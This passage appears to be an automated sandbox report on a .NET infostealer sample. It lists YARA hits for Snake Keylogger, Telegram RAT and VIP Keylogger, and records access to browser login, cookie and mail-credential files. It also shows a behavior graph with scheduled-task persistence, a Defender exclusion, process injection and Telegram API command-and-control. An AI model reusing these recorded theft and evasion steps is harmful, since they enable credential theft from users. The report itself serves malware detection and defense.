                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Users\user\Desktop\2i3Lj7a8Gk.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeQueries volume information: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeQueries volume information: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 00000006.00000002.4142790643.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.4143062604.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 7.2.lyNyKapwZJLKnn.exe.4b973e0.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.2i3Lj7a8Gk.exe.4662820.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.lyNyKapwZJLKnn.exe.4b973e0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.2i3Lj7a8Gk.exe.4662820.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.2i3Lj7a8Gk.exe.45dce00.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.2i3Lj7a8Gk.exe.45573e0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000002.1769534366.0000000004B97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1769534366.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1723487910.000000000432A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 2i3Lj7a8Gk.exe PID: 6360, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: 2i3Lj7a8Gk.exe PID: 7180, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: lyNyKapwZJLKnn.exe PID: 7260, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: lyNyKapwZJLKnn.exe PID: 7540, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 7.2.lyNyKapwZJLKnn.exe.4b973e0.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.2i3Lj7a8Gk.exe.4662820.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.lyNyKapwZJLKnn.exe.4b973e0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.2i3Lj7a8Gk.exe.4662820.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.2i3Lj7a8Gk.exe.45dce00.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.2i3Lj7a8Gk.exe.45573e0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.4140515962.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1769534366.0000000004B97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1769534366.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1723487910.000000000432A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 2i3Lj7a8Gk.exe PID: 6360, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: 2i3Lj7a8Gk.exe PID: 7180, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: lyNyKapwZJLKnn.exe PID: 7260, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Users\user\Desktop\2i3Lj7a8Gk.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                  Source: C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: Yara matchFile source: 13.2.lyNyKapwZJLKnn.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.lyNyKapwZJLKnn.exe.4b973e0.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.2i3Lj7a8Gk.exe.4662820.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.lyNyKapwZJLKnn.exe.4b973e0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.2i3Lj7a8Gk.exe.4662820.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.2i3Lj7a8Gk.exe.45dce00.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.2i3Lj7a8Gk.exe.45573e0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000002.1769534366.0000000004B97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1769534366.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.4142790643.0000000003179000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.4143062604.0000000002C89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1723487910.000000000432A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 2i3Lj7a8Gk.exe PID: 6360, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: 2i3Lj7a8Gk.exe PID: 7180, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: lyNyKapwZJLKnn.exe PID: 7260, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: lyNyKapwZJLKnn.exe PID: 7540, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 00000006.00000002.4142790643.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.4143062604.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 7.2.lyNyKapwZJLKnn.exe.4b973e0.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.2i3Lj7a8Gk.exe.4662820.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.lyNyKapwZJLKnn.exe.4b973e0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.2i3Lj7a8Gk.exe.4662820.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.2i3Lj7a8Gk.exe.45dce00.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.2i3Lj7a8Gk.exe.45573e0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000002.1769534366.0000000004B97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1769534366.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1723487910.000000000432A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 2i3Lj7a8Gk.exe PID: 6360, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: 2i3Lj7a8Gk.exe PID: 7180, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: lyNyKapwZJLKnn.exe PID: 7260, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: lyNyKapwZJLKnn.exe PID: 7540, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 7.2.lyNyKapwZJLKnn.exe.4b973e0.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.2i3Lj7a8Gk.exe.4662820.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.lyNyKapwZJLKnn.exe.4b973e0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.2i3Lj7a8Gk.exe.4662820.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.2i3Lj7a8Gk.exe.45dce00.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.2i3Lj7a8Gk.exe.45573e0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.4140515962.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1769534366.0000000004B97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1769534366.00000000049FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1723487910.000000000432A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 2i3Lj7a8Gk.exe PID: 6360, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: 2i3Lj7a8Gk.exe PID: 7180, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: lyNyKapwZJLKnn.exe PID: 7260, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Scheduled Task/Job                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		11
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		1
                  File and Directory Discovery                  		Remote Services11
                  Archive Collected Data                  		1
                  Web Service                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/Job1
                  Scheduled Task/Job                  		111
                  Process Injection                  		1
                  Deobfuscate/Decode Files or Information                  		LSASS Memory13
                  System Information Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		3
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                  Scheduled Task/Job                  		3
                  Obfuscated Files or Information                  		Security Account Manager1
                  Query Registry                  		SMB/Windows Admin Shares1
                  Email Collection                  		11
                  Encrypted Channel                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                  Software Packing                  		NTDS11
                  Security Software Discovery                  		Distributed Component Object ModelInput Capture1
                  Non-Standard Port                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Timestomp                  		LSA Secrets1
                  Process Discovery                  		SSHKeylogging3
                  Non-Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading                  		Cached Domain Credentials31
                  Virtualization/Sandbox Evasion                  		VNCGUI Input Capture24
                  Application Layer Protocol                  		Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Masquerading                  		DCSync1
                  Application Window Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                  Virtualization/Sandbox Evasion                  		Proc Filesystem1
                  System Network Configuration Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
                  Process Injection                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1527690 Sample: 2i3Lj7a8Gk.exe Startdate: 07/10/2024 Architecture: WINDOWS Score: 100 46 reallyfreegeoip.org 2->46 48 api.telegram.org 2->48 50 5 other IPs or domains 2->50 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 Antivirus detection for URL or domain 2->62 68 10 other signatures 2->68 8 2i3Lj7a8Gk.exe 7 2->8         started        12 lyNyKapwZJLKnn.exe 5 2->12         started        signatures3 64 Tries to detect the country of the analysis system (by using the IP) 46->64 66 Uses the Telegram API (likely for C&C communication) 48->66 process4 file5 38 C:\Users\user\AppData\...\lyNyKapwZJLKnn.exe, PE32 8->38 dropped 40 C:\...\lyNyKapwZJLKnn.exe:Zone.Identifier, ASCII 8->40 dropped 42 C:\Users\user\AppData\Local\...\tmp760C.tmp, XML 8->42 dropped 44 C:\Users\user\AppData\...\2i3Lj7a8Gk.exe.log, ASCII 8->44 dropped 70 Uses schtasks.exe or at.exe to add and modify task schedules 8->70 72 Adds a directory exclusion to Windows Defender 8->72 74 Injects a PE file into a foreign processes 8->74 14 2i3Lj7a8Gk.exe 15 2 8->14         started        18 powershell.exe 23 8->18         started        20 schtasks.exe 1 8->20         started        76 Multi AV Scanner detection for dropped file 12->76 22 lyNyKapwZJLKnn.exe 12->22         started        24 schtasks.exe 12->24         started        26 lyNyKapwZJLKnn.exe 12->26         started        28 lyNyKapwZJLKnn.exe 12->28         started        signatures6 process7 dnsIp8 52 api.telegram.org 149.154.167.220, 443, 49763, 49775 TELEGRAMRU United Kingdom 14->52 54 reallyfreegeoip.org 188.114.96.3, 443, 49734, 49736 CLOUDFLARENETUS European Union 14->54 56 2 other IPs or domains 14->56 78 Loading BitLocker PowerShell Module 18->78 30 WmiPrvSE.exe 18->30         started        32 conhost.exe 18->32         started        34 conhost.exe 20->34         started        80 Tries to steal Mail credentials (via file / registry access) 22->80 82 Tries to harvest and steal browser information (history, passwords, etc) 22->82 36 conhost.exe 24->36         started        signatures9 process10

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  2i3Lj7a8Gk.exe79%ReversingLabsByteCode-MSIL.Spyware.Negasteal
                  2i3Lj7a8Gk.exe41%VirustotalBrowse

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\lyNyKapwZJLKnn.exe79%ReversingLabsByteCode-MSIL.Spyware.Negasteal

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

